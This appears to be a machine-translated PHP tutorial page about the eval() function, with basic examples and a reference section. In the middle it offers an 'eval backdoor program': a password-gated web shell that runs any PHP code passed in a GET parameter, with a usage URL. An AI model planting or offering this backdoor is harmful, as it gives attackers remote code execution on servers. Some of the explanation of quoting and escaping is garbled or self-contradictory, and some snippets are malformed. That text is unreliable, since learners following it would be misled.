Introduction to PHP eval functions
- 2020-12-05 17:07:49
- OfStack
Code:
eval("echo'hello world';");
The above code is the same as the following code:
echo"hello world";
Output in the browser: hello world
The following points should be noted when using eval() :
1. The argument to the eval function must have a semicolon at the end of the string, followed by an additional semicolon (this is the php limit).
2. Pay attention to single quotes, double quotes and backslashes. If there is a variable in the argument and the variable has an assignment, the $1 symbol before the variable must have \ to escape. No assignment is required if there is no assignment.
Code:
$a=100;
eval("echo$a;");
Because there is no assignment operation, you can escape $. Without \ as follows:
$a=100;
eval("echo\$a;")
3. Note that the imperative string (including semicolons) must be enclosed in double or single quotation marks as needed. Otherwise, error.
An imperative string is a string that contains commands such as echo and print.
If the argument has only one variable, you may not use it. Such as:
$func =<<<FUNC
function test(){
echo "test eval function";
}
FUNC;
eval($func);
test();
Share an php eval backdoor program
The eval function must be supported
Method of use
http://url/test.php?pwd=admin
&
action=eval
&
a=phpinfo();
<?php
$passwd="admin";if($_GET['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>
PHP eval() function introduction
Definition and usage
The eval() function evaluates the string as the PHP code.
The string must be a valid PHP code and must end with a semicolon.
If the return statement is not called in the code string, NULL is returned. If there is a parsing error in the code, the eval() function returns false.
grammar
eval(phpcode)
参数 | 描述 |
---|---|
phpcode | 必需。规定要计算的 PHP 代码。 |
Hints and comments
Comment: The return statement immediately terminates the evaluation of the string.
Note: This function is useful for storing code in a database text field for later computation.
example
<?php
$string = "beautiful";
$time = "winter";
$str = 'This is a $string $time morning!';
echo $str. "<br />";
eval("\$str = \"$str\";");
echo $str;
?>
Output:
This is a $string $time morning!
This is a beautiful winter morning!